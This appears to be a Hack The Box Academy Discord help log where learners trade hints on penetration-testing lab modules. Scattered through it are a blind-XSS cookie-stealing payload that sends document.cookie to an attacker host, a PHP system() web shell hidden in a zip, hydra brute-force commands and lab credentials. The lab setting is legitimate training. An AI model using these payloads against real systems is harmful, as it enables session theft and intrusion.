#modules
Generate the tokens and test them through
The commands I've tried are download options. So, are there any read options? Or is this how it is?
you might be missing something
a bit, the answer to the first question in the exercises
but you are on the right path, once you have some working credentials
I've completed the questions, it's just something I'm curious about. Like why smbmap with null auth said I had read access
but yet, I wasn't able to download
or read with get file -
False positive?
My bad, I totally forget that was an answer
You need credentials to download it
I see.
I can't get to connect with the Java application in the next exercise either. Literally the only 2 I have left, and I'm trying to start the cert exam X.x
the application does not seem to be making the DNS queries like shown in the module. If anyone has done either of the thick client modules please hit me up
Module:ATTACKING COMMON SERVICES
Section: Attacking DNS
Question: Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer.
Results:
Stuck on this one. Any hints would be appreciated.
- I located all three subdomains h.inlanefreight.htb, c.inlanefreight.htb and n.inlanefreight.htb. I might be missing one?
- Performed dig on all subdomains (dig any @white rock subdomains).
- Used subbrute on inlanefreight.htb.
For subbrute was the resolvers.txt just inlanefreight.htb? (No need to edit the names.txt) also is inlanefreight.htb in your /etc/hosts
Note* I just tried this yesterday, and did indeed confirm you need to double check the spelling
why can't I specify the password without it erroring?
Because bash is interpreting the !
how can i do it right
Any password that has any special symbols put in single quotes
alright, I thought double quotes
Single quotes is literal string
Double quotes allows some parsing to still happen
@fathom pendant hi yes, the spelling is correct and the only thing in my resolvers file is inlanefreight.htb. I was able to find the subdomains but whenever I try to do an AXFR transfer it fails. Tried adding subdomains to my hosts file as well but still nothing
The subdomain is one of the first ones that should appear
Dig should allow you to access it
Are you including the @\ip in your dig?
Fucking discord shir
BC some Dingus named ip
nvm found it works now thank you @fathom pendant
Remove the command as it's spoiling
But yeah it doesn't know what that resolved to lol that's why it failed
https://academy.hackthebox.com/module/112/section/1079
I have now RDP'd into the server and started the SQL software. Now it asks for a username and password; however, after enumerating everything I can't find them. Brute forcing is not the goal, right? Could anybody give me a hint?
What module?
Footprinting Lab - Medium
That's the one with j* yeah?
j*?
Username
how do i do the discord spoiler thing
Ok then I'm thinking a different one
Thank you xD
Look for some important documents
ohhh right
That will contain some important login info
Hint: it's a windows machine. What other user could they be for
Admin?
:)
¯\_(ツ)_/¯
I'm in the Administrator's documents
That was the whole point lol
what login name could an admin have?
Also iirc you need to use local auth
hello,
AD?
Alternative is cmd line and running sqlcmd
I am in the Pass the Ticket for Windows and tried to xfreerdp into it using
xfreerdp /u:Administrator /p:"AnotherC0mpl3xP4$$" /v:10.129.204.53
But it doesn't work. Is it normal?
I tried with evil-winrm as well.
Single quotes?
oh really? Let me try..
Azure Active Directory - Password?
OMG thx it works......... I feel so stupid....
See which ones work
none :/ i get: TITLE: Connect to Server Login failed for user ''. (Microsoft SQL Server, Error: 18456)
There is one that will log you in
sa right

As I said
Click all options
Try everything
Then come back if truly NONE of your attempts work
And you tried all the login options from the drop down?
yes
Run ms sql studio as admin
Don't even need to do that (if rdp as admin)
Just need * auth
Alternative is command line sqlcmd
Can someone help dumb Pass the Ticket (PtT) from Linux down for me.
Check Carlos' crontab, and look for keytabs to which Carlos has access. Try to get the credentials of the user svc_workstations and use them to authenticate via SSH. Submit the flag.txt in svc_workstations' home directory.
I found the .kt cronjob but I am clueless on what to do next to get svc_workstations creds.
make sure you've tried to extract all keytab files, not just the one which is mentioned in the script that gets executed by crontab.
Also, I'm saying that assuming that you know how to extract the hashes from .keytab files
but didn't succeed to move further with the one you have
@misty current can I dm you
did you cat the file mentioned in the crontab? You can see where the others .kt are located
Yes one with _all.kt and the .kt. not sure what to do with them I think I tried decrypting them
you're almost there, try to see what you can do with that ".kt" going back through the section
Hello, I just completed Pass the ticket from windows...
But for the remoting part, I succeeded without understanding...
Can somebody explain where the
aes256:9279bcbd40db957a0ed0d3856b2e67f9bb58e6dc7fc07207d0763ce2713f11dc
Is coming from? I did not see it when I dumped the hashes.
Attacking common services: DNS. I've used subbrute and have 4 subdomains, not sure where I go from here, not digging anything up. Help would be welcomed, go easy, I'm dumb
You need to find all zones
You should be able to dig one of them @ the ip
We should pin this answer lol. I had this question and I've seen 5-8 others
Also, gz on Community Cont isn't that new?
Relatively
They stole it from me in my sleep
Robbed in your prime
I'm stuck on the assessment. Compromised two users, one being the local admin on SERVER01 but not sure as to what krbtgt to steal
kept digging and got there, thanks!
I am stuck on Password Attacks > Password Reuse / Default Passwords.
The question is :
Use the user's credentials we found in the previous section and find out the credentials for MySQL. Submit the credentials as the answer. (Format: <username>:<password>)
What I have done :
- used hydra over an SSH tunnel against server port 3306.
- found a zip on the box (Notes.zip) password protected with a password from the mutated password list.
- reused this password and the previously gathered one (from user sam) against the username.list file
Any hint on this topic would be appreciated
Notes.zip is not required at this time
Perhaps a look at history may help
I checked it but was only having my own commands
(haven't checked it as soon as I log on... will try to reset the machine, thanks)
I am currently resetting... I had looked at it too late and the history was flushed I guess
merci !
are you sure we're talking about the same question? here is what I get after a fresh reset:
yes ...? (I wonder if you are really asking or asking me to think again...)
Yeah no use the default creds cheatsheet
lol
ohh
thanks
Yeah there's only a few so it's easy to manually try
In the Password Attacks - Network Services module - "Find the user for the SMB service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer." ----> found the user, got the list of shares and am only showing 1 with "READ" capability...the flag file does not seem to be found and using "ls" does not work. Anyone have any hints would be super!
should be dir for windows
I'm missing something obvious on a module, if I could get some help
I'm smol
Anyone free for a nudge on the Kerberos Attacks assessment? I am on the very last part, and have compromised two users (one is a local admin)
For the Footprinting/imap+pop3, I'm having trouble answering the question What is the admin email address?. I found the cto.dev@dev.inlanefreight.htb but that does not seem to be the answer?
You're close. Read the email. You may need to use the 1 fetch <id> body[] to fully see the email info
trying to get the flag for the exercise where you authenticate to a web server with admin:admin and use the dev tools to see what requests its making to find the flag, maybe its hidden in some js somewhere idk
I found the cto.dev@dev.inlanefreight.htb address by using this code curl -k 'imaps://10.129.X.X' --user robin:robin -v but when I login using this code openssl s_client -connect 10.129.X.X:imaps and proceed to login with the username and password, I'm not sure how to utilize the commands correctly? I'm not seeing the email that you're talking about for me to open or get in to??
Well first you have to get to the right folder
Are you referring to the \Answered \Flagged \Deleted \Seen \Draft \*?
No
I'm referring to the 1 List "" * command referenced in the section

It helps to read and understand the section of the module you're doing
Exactly how do I access those dir's?
Refer to the commands listed in the section
It's literally right there
The only command I'm really having you modify is the 1 fetch 1 all to 1 fetch 1 body[]
Yes the brackets are important
MarcieLee, do you think you could possibly give me a nudge if you have done the module?
Haven't done web requests but my guess is its network request or something in dev tools in webpage
¯\_(ツ)_/¯
ok thanks, yeah I checked the main request and the other ones in the network tab expecting something to jump out like a new endpoint or something but there was nothing interesting
ill keep poking at it
do you answer to all of us without reading any notes ? just from memory ?
Mostly memory some notes if I'm recalling it was a bit tough
Sometimes it's the fact that the info was right on the page on how to start the enumeration
That's always the first suggestion. Read the section thoroughly
Because 9/10 times you skipped over something
I probably don't practice enough then ...
The tougher it is the more I'll need notes.
(or you often answer the same questions ? :D)
It's usually the same question reworded
And the IMAP one specifically I've linked to articles containing useful IMAP commands
Because I needed those for doing it via command line
indeed, IMAP tutorials were more interesting to me than the academy section content
(there is a way to do it through an email client like evolution)
who wants to do it using the GUI
It's just the fetch example command that I have an issue with
Because it mostly gives garbage aside from just data info, but not the content of the email
Usually the only times where this isnt the case is because its the skill assessment and youre meant to apply the information in a slightly different context.
In which case I mean sorry bro but its a skill assessment lol
Yeah theres plenty of assessments that's just 'do these three sections instructions in order'
Wow thanks!
hi, I am having an issue with the brute force hydra skill assessment wordlist. Got the first question right, but on the second it finds the password but it does not work: hydra -l user -P rockyou.txt -f 188.166.151.118 -s 31557 http-post-form "/admin_login.php:username=^USER^&password=^PASS^:F=<form name='admin_login'" I cannot get the flag as nothing lets me in, thx
Attacking Thick Client Applications - c:\programdata\restart-service.exe
Does anyone know how to make this restart-service.exe file appear in that folder? I've reset the box 5 times now and followed the instructions perfectly, but that restart-service.exe file has yet to appear. I've noticed that I can't run powershell on this box, so that seems like a problem if the lab involves running a powershell script.
Edit
Ok, it looks like it took roughly 6 restarts of the box for powershell to work.
I suggest before doing anything on this box, make sure powershell works and once you confirm that, then you can begin. If not then everything you do is pointless.
This section was not a great addition to the module. Information overload for someone who has never reversed before. Teach us how to walk before showing us to how run, it's useless knowledge that we won't absorb properly.
the point is that it gave me a password but when I type it in it fails. I tried modifying the hydra command line, still get password ok but the login page does not accept it. I have even used admin as well, the form link ends in admin_login.php. It is driving me nuts, I am not asking for the flag just a point in the right direction, thank you
typically if hydra is giving false positives it's because the failure condition isn't quite right
also double check you're using the right parameters
Can someone assist me with the password cracking Hard lab? I am not sure what to do with a file that I found.
I am having issues finding a pathway on a Linux pathway
did you try reading the file
That is what I am trying to do. I can mount the share without issue but when I try and mount the vhd it asks for a passphrase and I am not finding anything online about cracking this type of file.
so not sure if I am missing something?
did you ID what type of vhd it is
I am not sure how to do that
in Windows or Linux?
I can run 'file' on it and tells me what OS
what does it say
I see it's GPT, but I haven't found anything useful about it
sorry screenshot cut off
GPT is just a partitioning type
Mad can you help me after this?
I could be misremembering this section. It's been a hot minute and my assessment notes aren't the greatest
idk, im literally in my car about to drive home lol
no worries, ill wait to see if anyone else can help
or if HTB reaches out
thanks man
I am still stuck on this.
If anyone has a way to do Exploiting Web Vulnerabilities in Thick-Client Applications really fast, please reach out through PM. I skimmed through the section and none of it makes sense and it isn't explained, so I'm hoping to just finish it as fast as possible
Not to be rude or anything. Try going a bit slower, ask questions along the way and make connections.
For sure, if I really wanted to, I could learn everything in this 1 section, but it would take me days to finish it and a lot of reading/research. I've searched the name of the section here on discord and there are over 30 results of people complaining, one mentioning wanting to commit suicide because of it. I've completed everything in this module except this part and don't find it helpful at all after looking through the material. I prefer to find a shortcut that would allow me to do the sql injection in the least amount of steps possible, so I can reserve my sanity for more productive modules. This module is considered medium and it seems really strange to have everything flow a certain way and then put in a section that's more difficult and time consuming than all 3 final assessments combined.
What module btw?
Haven't done it, but I'll add module, which section and question
System info and the mail pathway question
Check the environment command
Someone doing the AD enumeration and attacks module? Think I just RDP'd into someone's box that they'd been using lol, got booted off 10 seconds later, so I imagine someone wanted it back
Just have to type "env" or "printenv"
Heck, you can even type "echo $MAIL"
How did that get past me when I pwd the mail directory
Hi
web request
web deny
What's the baked in windows encryption feature
I'm still trying to figure out how to run 50064.rb in metasploit. I copied it to the same directory structure as exploitdb and updated and restarted msfconsole, but when I search for 50064 in msfconsole, I get no results
@fathom pendant good evening, im hoping for a nudge in the right direction with Web Attacks if your'e available
Haven't done it
well alrighty then, no worries
What exactly is not working?
@acoustic owl I have not everything turned off now, I'll be working on it tomorrow night if you're around
I don't know what time zone you live in.
Here is currently morning
@acoustic owl I'm in San Diego right now
anyone able to help me with the HACKING WORDPRESS User enum part please? I am unable to get more than the first user to be displayed via the curl command
which section
Hi, I'm on Linux Privilege Escalation - Skill Assessment, I'm stuck with flag5.txt, can someone help me? Any hints? Can I DM someone? I think I'm pretty close to getting it. Thx.
section User enumeration
use the provided outputs
I've done that but only get ID1 back
how to run commands as superuser
you don't need to run any kind of commands to solve the exercise
thanks bud
Can anyone help me with the module Footprinting Lab - Easy? I know that I need to brute force FTP credentials. I tried ftp-brute.nse from nmap but it takes too long...
try Hydra and increase the threads to 64
Thanks! I'm using (for usernames) the wordlists that HTB provides in the footprinting module. But I don't know what wordlist to use for passwords. Rockyou is so big...
I'm trying it with seclists
for the username pay attention to the details, check the nmap output scan
OMG thanks!
Can someone please DM me about the Attacking Common Services Easy lab.
Where exactly are you stuck?
<@&861185840277487616>
Thank you
anyone else having problems with target machines? target machines are unpingable.
Scenario, its pingable at the beginning but once I xfreerdp into it, it disconnects after a few seconds
Module: Windows Privilege Escalation
Hey! sup
yep @lyric raft it happened to me
is it still going? or you just skipped the module for now?
usually restarting my pc fixed it
amma get to it later then, thank you!
np
I have a problem: curl: (6) Could not resolve host: admin.academy.htb
I added the ip + admin.academy.htb in the /etc/hosts...
any idea? and the vpn is on too
Hello! I got a question about the Session Hijacking part of the Cross-Site Scripting module: is there a particular reason to load a remote script and not just have it directly executed once a Blind XSS is found?
Instead of having a js file with something like new Image().src='http://MY_IP/cookie.php?c='+document.cookie; and sending an injection to load it (eg <script src=http://MY_IP/script.js></script>)
why not just directly inject <script>new Image().src="http://MY_IP/cookie.php?c="+document.cookie;</script> ?
The main pro I see for the 1st method would be the ability to modify the code loaded by the users, but any other reasons?
What is the context? Can you ping the machine?
Can someone give me a hint at https://academy.hackthebox.com/module/112/section/1080 ? I'm in the ssh server logged in as ||tom|| but I can't seem to find the ||mysql|| password. I looked over every hidden file but without success.
I have the username but I don't find the password. I know that it is in rockyou.txt (in line 4000 more or less) but hydra does not find that password
I know the password thanks to the hint and I saw that it is in rockyou line 4000 more or less
But hydra does not find the password, and I would like to find it myself
no i cant
Hint: users often reuse the same password for multiple apps/services
wellllll you're right it does seem so
got it ty
Which module are you doing?
Anyone know why the error permission denied (public key) appears?
When I try to connect by ssh
Guys, any idea to whom can I write about a badge not showing up after a couple of modules are being completed ?
In the Password Attacks - Network Services module - "Find the user for the SMB service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer." ----> found the user, got the list of shares and am only showing 1 with "READ" capability...the flag file does not seem to be found and using "ls" does not work. Anyone have any hints would be super!
You have to connect to a share with a proper user and password to get the flag.
how did you try to connect to the SSH?
You need to connect to it with the correct private key
I've enumerated the SMB users in metasploit, using the resource lists in the module, only one user yielded and while that user has access to the shares, the commands aren't werkin
dm
Hello, can anyone assist a bit with the HTTP Attacks module
What are you trying to achieve with responder?
obtain user hashes
im doing AD enum and attack module
llmnt nbt-ns poisoning from linux
DM me
llmnr*
You could run the way you did but for llmnr and NetBIOS poisoning, I'd just run sudo responder -I tun0
It'll get the job done
for both users?
It depends, some ad stuff is through a jump host
not sure wym by both users but if you mean both LLMNR and NetBIOS? Then yes.
True that
If they're saying the ens* one, then it's a jump host
not always tho right?
If I'm recalling this exercise it's what they have you do
Hi can someone please help me with a FTP problem. I don't know why, but it always gives me a FTP timeout for some reason, am I doing something wrong?
Ah, for the modules. nvm, I was taking the convo to real life.
What exactly are you doing?
ftp (ip)
This should work without problems so far
result:
ftp: Can't connect to `10.129.58.190:21': Connection timed out
ftp: Can't connect to `10.129.58.190:ftp'
ftp>
For Attacking Common Applications Attacking Tomcat
I cannot seem to find the password. Am I doing something wrong?
Just do ftp ip
Don't need to specify port
I didn't specify no port, I just typed ftp and the ip.
It take some time, but then I get a timeout error.
I'm doing the LLMNR and NetBIOS poisoning on Windows
and cannot connect to rdp :/
anybody had a similar exp?
I tried restarting the machine
checked 100 times the credentials and they are fine
What module
Elaborate sorry, I am still learning so idk wdym by "module"
Starting point.
Then this is the wrong place
Oh sorry.
Attacking DNS Module, The target expires before the subdomain brute-forcing even completes
Then you are definitely doing something wrong.
Which module and what exactly are you doing?
I did get 4 subdomains, 3 from seclists. Since I couldn't zone transfer on those 3, I ran subbrute and I got 1 one more, but I couldn't zone transfer that either.
Are you doing dig axfr b.inlanefreight.htb @<IP>
Yup,
Dm me the ones you found
Oh
Wait
You did fuck up
Look at your dig command
You're missing the .htb
:)
Ahh, true but I tried this command multiple times before and it did show me the same error even with .htb
here's an older one
And, I think I just got 2 more when I thought the target died. No way they named one of the subdomains that, lmao
Dm me the list you've found
Sent you
Any body know how to access phones and computer (Apple devices) without passwords? I am asking for ethical hacking purpose.
Ahh, I did fuck up. Missing the .htb for the latest subdomain was the mistake. Thanks @fathom pendant
:)
Also I answered you on a diff server
are you still having issues
Yes
give me a sec to go over my notes
Thank you
you have added the entry to your hosts file, right?
Let's go to DMs
sure, go for it
the relevant channel for this
you'll find the correct channel after
I am trying to do "Windows File Transfer Methods" under File Transfers, but when I am attempting to RDP to the target, it keeps timing out and failing, this is from the PwnBox
I have tried resetting both PwnBox and target, but still timing out
Anyone had the same issue, or just me?
thanks
Are you happening to also be connected to the VPN at the same time
I was, does that mess with it?
It does indeed
Ahh gotcha, appreciated!
When doing a password attack against a domain controller, is it possible to use the LDAP module of CME instead of SMB ?
LDAP should be faster imo but I am not sure if everybody can authenticate to LDAP (and cme ldap -u 'user.list' -p 'pass.list' gives me error messages suggesting LDAP may not be available Error connecting to the domain, are you sure LDAP service is running on the target ?)
and TCP/389 is opened, yes
I haven't tried messing around with the cme ldap module, but done some messing around with ldapsearch
you could probably script that but idk if it'd actually be any faster
Hello guys, I am doing Active Directory Enumeration & Attack module: living off the land
I am stuck at the last question where: Utilizing techniques learned in this section, find the flag hidden in the description field of a disabled account with administrative privileges. Submit the flag as the answer.
I found the one filtering that disabled account : (&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=2))
but not sure about the administrative privileges
can anyone help me?!
I am not on that module yet, but do you have access to BloodHound?
yeah
can't you use it to identify privileged accounts?
ha ok sorry
and using something like (&(objectclass=group)(CN=Domain Admins)) ?
I am still struggling on the password attacks hard lab. I have everything I need to mount the VHD file (including password), but nothing is working. I try and list partitions, but there aren't any?
mounting it in Linux was a bit of a pain but doable. If you're struggling the intended route is to mount it from Windows.
ill try that first I suppose
This is a guide on how to access a BitLocker-encrypted Windows volume from Linux, useful in cases of dual-booting Windows 10, 8 or 7, and a Linux distribution. It covers how to decrypt and mount the BitLocker partition from the command line, as well as how to add it to /etc/fstab, so it's automatically mounted on boot.
yeah i looked at that too, but my issue is that its not showing any drives or partitions
i dont get it
On "Attacking Active Directory & NTDS.dit" with the question :
On an engagement you have gone on several social media sites and found the Inlanefreight employee names: John Marston IT Director, Carol Johnson Financial Controller and Jennifer Stapleton Logistics Manager. You decide to use these names to conduct your password attacks against the target domain controller. Submit John Marston's credentials as the answer. (Format: username:password, Case-Sensitive)
I have created a user.list using the provided firstname/lastname with the tool username-anarchy
Ran cme smb with the user.list and the password list provided in the resources.
I am not getting any success.
Is there a way to bruteforce faster than cme smb so I could consider using bigger password lists perhaps ?
sudo apt-get update; sudo apt-get install dislocker -y
sudo mkdir -p /media/bitlocker
sudo mkdir -p /media/bitlockermount
sudo losetup -f -P Backup.vhd
sudo dislocker /dev/loop0p2 -uYOURPASSWORDHERE -- /media/bitlocker
sudo mount -o loop /media/bitlocker/dislocker-file /media/bitlockermount
Read the Hint
anyone completed last question of SQLmap Essentials? Any tips for where is the POST request??
Too expensive the game hacking fundamentals in my opinion, for what it is
bro wtf lol. I have zero idea why I can't find the partition. Those commands worked
||maybe u can buy something||
I even tried burp suite there :/
burpsuite why
to see all requests
Hello all, I am having problems with the module "Network Enumeration with NMAP" in the section "Service enumeration". I do all the Nmap scans that the module indicates, I even investigated a little and pulled the banners with the "banner" script or with a netcat. But whatever I put in the answer, I can't find the solution. Do I have to connect to any of the Dovecot services found, and if so, how? I can't find passwords anywhere apparently.
The result of the nmap is the following:
PORT STATE SERVICE
22/tcp open ssh
|_banner: SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.10
80/tcp open http
110/tcp open pop3
|_banner: +OK Dovecot ready.
139/tcp open netbios-ssn
143/tcp open imap
| banner: * OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID.
|_ENABLE IDLE LOGINDISABLED] Dovecot ready.
445/tcp open microsoft-ds
31337/tcp open Elite
which question ?
Enumerate all ports and their services. One of the services contains the flag you have to submit as the answer. I was reading another answer, but I am stuck now
any other tip for this bro?
did you try netcat to do banner grabbing?
nvm i found it thanks a lot
I don't remember of the solution, but according to your nmap output, can't you find something on the 31337/tcp port ?
In one of the Nmap scans that I do, I found something like TCP/IP fingerprint, I don't know if you refer to that
I tried also with scripts of nmap and similar things. But I didn't find anything. I think that maybe I didn't see something.. but I spent a lot of hours on this :(((
you can do banner grabbing using netcat
some services may take too much time to answer and nmap might not get info you will get using nc on the targeted port
OK, I will try!!! if I get it (or not hehe :( ) I'll let you know
FOUND IT!!! it was the banner, I don't know the reason but the last port did not show the banner correctly with nmap!! Thank you so much
as explained above, the service takes too much time to answer so nmap won't grab the banner. You may reread the course as it is well explained
Hello everyone!
Module: Password Attacks
Section: Attacking Active Directory & NTDS.dit
Last question. I can't copy the ntds.dit file. I already did the copy of "C:" 2 times(that's why there is harddiskvolumeshadowcopy<2>)
solved)
Can I DM someone about Attacking Common Services - Easy? I've got the user, got access to ||mysql|| and know I need to ||upload a web shell|| but when I do that ||I get a 404 error navigating to it||
nevermind, for those looking back I fixed it by doing / instead of \ in the ||sql query||
What badge is it?
Which module is this?
~~hello, working on Linux Privilege Escalation skills assessment flag5
I've found the binary that the user can run as sudo, but when I try using the command from GTFOBins
!/bin/sh
I get /bin/sh not found
am I doing something dumb?~~
I was doing something dumb
I noticed you resolved the "Unexpected json response" error. I'm getting the same error. Any hints? I've tried using different payloads
Did you get it resolved? The exploit did not show up for me by searching for 50064 in msf however "using" it allowed me to configure it and run the exploit. I ran into another error though
hi all, can someone advise for File Inclusion module, what does the hint '..see what path the regular functionality uses'?
if I remember correctly check vhosts setting
sup
hello guys for the Active Directory Enumeration & Attack: Kerberoasting - from Linux, do we have to crack the password for user "forend" ?
seems like previous password doesn't work
I was confused on this also... I just used the sqldev password from the section write up
may I get assistance with a module, possible issue with content
Just ask your question
Here everyone gets support with the modules. What is it about?
bro why are you blue?))
They've been marked as superior beings 
can I post photos && files here?
yeah
I think I may have gotten the wrong data back to a table not asked for, however I need a second opinion if possible
Try to avoid posting spoilers (answers)
Try checking for phantom spaces before and after your answer
You're searching for the wrong table, remember to view and intercept the request on the case#3 page and modify the position where you want to insert payloads accordingly
But also please remove your photos and upload ones with answers edited off
The answer you have is flag1 as shown in the output as well
Is there any way to reset your learning path and progress
They do have a "retake module" option for each module. But, not sure if that'll reduce the path progress.
where is that option at??
It's usually at the completion page where you get redirected after finishing a whole module. I think you can access it directly by just accessing the last section of the module and hitting the 'Finish" button
sorry
thank you
please actually remove the images tho as they still spoil content
@terse igloo No problem. Also
They did it
how to remove the file tho, I did the photos
Just delete it
ok
hmmm not seeing anything like that
sorry for the delay, this is why I asked another fellow in another chat to assist via dm, to prevent sharing the answer content, however since it pertained to answering I felt the need to leave the answer open to see if it was accurate
so I am sorry for that
it will not do anything with answers
just the same as "view" on dashboard
Ah, never used it. That's all it does, huh.
Curious
Man, I can't even find that, huh. Odd.
I am always trying to reread.
CTRL+F)
Password Attacks > Pass the Hash: Can someone give me a hint on how to get the NTLM hash of the David account? I tried to use crackmapexec --lsa, but the hash dumped by that command is not accepted as the answer.
Use mimikatz
Hi, working on the Tier 0 modules. I started with the File Inclusion one, but in the third section under File Disclosure, "PHP Filters", it tells me to fuzz an application and I haven't done that module. Should I swap modules and finish Ffuf first?
Did you try with mimikatz?
I tried mimikatz with the given Administrator hash. Do I need to find a way to log in as David before running mimikatz?
Did you try to run mimikatz? What is the output? EDITED: Regarding crackmapexec, dumping LSA requires Domain Admin or Local Admin privileges on the target Domain Controller.
The target doesn't necessarily need to be the DC to dump LSA.
when it comes to dumping secrets, Mimikatz just does it better as far as I've heard.
In the end it's the same, using mimikatz to dump the creds in memory.
depends on the situation
Yup
Just running Mimikatz on an Administrator shell is all you need.
Also, I don't remember for this particular section. Maybe David is a local user on that machine? You'd need to dump the SAM then.
Mimikatz works just fine dumping the LSASS.
When I tried this, all I got back was the hash of the Administrator account that I already had.
Tried it already, the SAM doesn't have a user named David.
One of the two, possibly. Will DM you to see the output of the command.
You might just not be submitting the right hash, or having the format wrong
What role ensures that objects in a domain are not assigned the same SID??? In Introduction to Active Directory.
Why is it not accepting my answer?
Usually, this happens when it is not the correct answer.
RID Master is the answer, but it says wrong.
Well, because perhaps it is expecting it in another form.
Found it, thank you.
Having the same problem now, how did others who completed the path beat this one?
Hi guys, I have a question about the module File Inclusion.
echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php
This works, but why doesn't the next command?
echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.txt shell.php
zip warning: missing end signature--probably not a zip file (did you
zip warning: remember to use binary mode when you transferred it?)
zip warning: (if you are trying to read a damaged archive try -F)
which section in File Inclusion module are you doing? @boreal basalt
Why does hydra always give me the wrong password?
hydra -l user -P rockyou.txt -u -f IP -s PORT http-post-form "/admin_login.php:user=^USER^&pass=^PASS^:F<form name='log-in'"
What am I doing wrong?
Also, are you sure that "user" is actually the username?
Remove the -u, then try.
Where are you running this command?
Guys
In the File Upload (module)
Why is no PHP code executed?
It always says "XML processing not supported in HTML"??
Hi, how can I download and execute a file in PowerShell 2.0?
On AD Enumeration & Attacks, Password Spraying - Making a Target User List
it say
says*
" Enumerate valid usernames using Kerbrute and the wordlist located at /opt/jsmith.txt on the ATTACK01 host. How many valid usernames can we enumerate with just this wordlist from an unauthenticated standpoint? "
How do I know what ATTACK01 is?
Still doesn't get the password.
-u doesn't matter. It just rotates the usernames instead of the password when brute-forcing.
Is there anything I should fix in the command?
The password is still not correct, and hydra's result always changes.
What's the section name for this module?
Login Brute Forcing skills assessment - website
Question 2
Oh, I got the answer now.
I forgot to put = after :F
Thanks man
Good job finding it on your own
Hello all. I'm doing the module Getting Started, and for some unknown reason the server at the Public Exploits section is down. I tried refreshing, using Pwnbox, but no success. Someone help.
Got it thanks
Good morning everyone
I am in Password Attacks, Credential Hunting in Windows.
When I use lazagne.exe it closes the prompt as soon as the scan ends; I can't view the results.
Where does one find the Intro to Zephyr track?! Can't seem to locate such a track.
Probably on the main site if I had to guess
I was thinking it would be one of the modules... Thanks Marcie!
Guys, I need help with the Stack-Based Buffer Overflows on Windows x86 module, part Remote Fuzzing. I've been stuck here for 2 days, please help.
@opal jewel can you help? You're a pro.
What is your actual question that you're stuck on?
Can't**
@fathom pendant I'm connected to the Windows machine using RDP, okay. I also made a Python script that will send buffers of 500 and +500 every time, but I'm not getting how they used the script.
@fathom pendant can you join VC so I can show?
No
@fathom pendant why?
Try a secondary resource to maybe get another explanation on BOF.
Tib3rius has a good guide, and TCM on YouTube offers an easy explanation.
you don't have permissions to stream
I think what you're searching for is the Penetration Tester path?
I found it already. Thanks!
BTW, I love the integrated terminal, but wish I could pop it out to a new window like Pwnbox.
True, I just pull out the tab to a new window and use it that way sometimes.
oh yeah that's a decent idea
Has anyone here done the Attacking FTP service module recently? It is not accepting any of my flags/answers. Very confused lol.
I brute forced FTP using the resources file and got a hit on a user, but it won't accept the answer for the 2nd question. I also SSH'd into the box using the account I found and got the flag for the last question, but it is not accepting it either.
Reload the module page.
Sometimes the answers are not accepted. After you reload the Academy page, it works again.
I think there is something funky going on with the boxes that are spawning. The flags that I am finding are referencing an SMB attack, not FTP. I'll try restarting the target a couple of times. Not sure if anyone else has seen this.
No dice, I guess I'll just wait for HTB to reach out.
What module?
It's the Attacking Common Services module, Attacking FTP.
And what happens when you ls?
in FTP?
Yes
Once I found the user for FTP, I logged in and there is a flag.
Funny enough, it's the same flag as when you SSH into the box (as the last question says).
But the 2nd question won't accept what user I am using FTP as, and it won't accept the flag.
But when I move on to the next section (Attacking SMB), it accepts all my answers lol.
Something buggy
The platform is acting like it's spawning the SMB attacks box, not the FTP one.
r* yeah?
No. I spawn the box on the FTP module and I get a hit on FTP as J****.
So it's acting like it's not spawning the right box.
Cause J**** is for the SMB attacking module.
Don't forget to utilize the resources
Took roughly 2-3 minutes and hydra spat out the right answer for me
I am, and it's only spitting out one user/password, and it's the J**** one. I figured out the username from what you mentioned, so I am only brute forcing with that to see if I can get the PW.
Note I used default threading
Are you attacking the right port as well? (-s option)
Yeah, attacking the FTP port it did not give me the j* username.
This is where I am getting confused. I am using the users.list and pw.list from Resources and I am attacking port ||2121||. The ONLY hit I get is J*... I am trying again with Hydra and using R* as a username. We shall see.
Can you DM me your screenshots, as I'm now curious?
Yes, I appreciate it.
Alright. I have been beating my head for days. AD Skills Assessment II, question 10: get the flag from the DC01 admin desktop. Have seen a few other people ask, with replies of "you don't need to login to DC01" and "check the perms of the last user you got", which is C****. Tried running through numerous enumerations in the AD and Win Priv modules. Gone in lots of circles. Nothing.
check file explorer
Guys, what modules should I do to be able to pwn at least the easy boxes?
You can check Academy x HackTheBox.
Yeah, I've done the following: Intro to Networking, Metasploit Framework, Web Requests, Attacking Web Apps with Ffuf, Network Enumeration with Nmap.
I've done these fully.
Completing the CBBH track
What's that?
Got it, thanks a lot man.
I have done normal enumeration and all. Am I missing something super obvious/glaring here?
It should be in there. It has been a minute and my notes are lacking on this one.
Oh, you mean once you are on DC01, I assume. I can't get on lol.
¯\_(ツ)_/¯
Like I said, it's been a hot minute and I'm currently revamping notes for older sections to bring them up to par.
Yea, fair enough.
I am using HTB Academy x HTB Labs and on some of the machines it's showing I only need to do 1 module to pwn a hard machine????
It's not like that. It shows which boxes allow you to test the skill you learnt from the module. Not completely pwning it.
Getting the shell/rce/flag is the ultimate goal, yes.
Yes, so isn't that what we're meant to do? Doesn't HTB Labs x HTB show which modules you should know to pwn the machine?
It gives you an idea of what would be useful to know.
If you're looking for that perspective, then in the HTB Labs x Academy you would need to search based on machines instead of modules.
That's what I'm doing.
Yeah, Soccer only shows Nmap.
I need to know way more than that.
But that's also probably because Soccer isn't that difficult in terms of what you should be doing.
Most likely a bit of exploring a webpage.
¯\_(ツ)_/¯
I checked a walkthrough; they be doing so much stuff irrelevant to Nmap.
I mean like the module.
Going through the CPTS path will give you the skills needed for easy and medium boxes.
I can't find that path.
It's a job role path.
Still doesn't show.
CPTS path = penetration tester
Bruh
The whole thing just for easy and medium boxes?
The boxes on HTB are tough.
Fucking hell, alright.
That might be feedback for the Academy x HTB then ¯\_(ツ)_/¯
But most of this is basic, aside from maybe sqlmap.
Instead of it helping me, it made me more confused.
It's just a light guide. Don't depend on it completely.
My initial question was about the modules
It's still a box-related question at the core.
It's possible it wasn't updated properly when it retired.
The relations aren't a bible to go by.
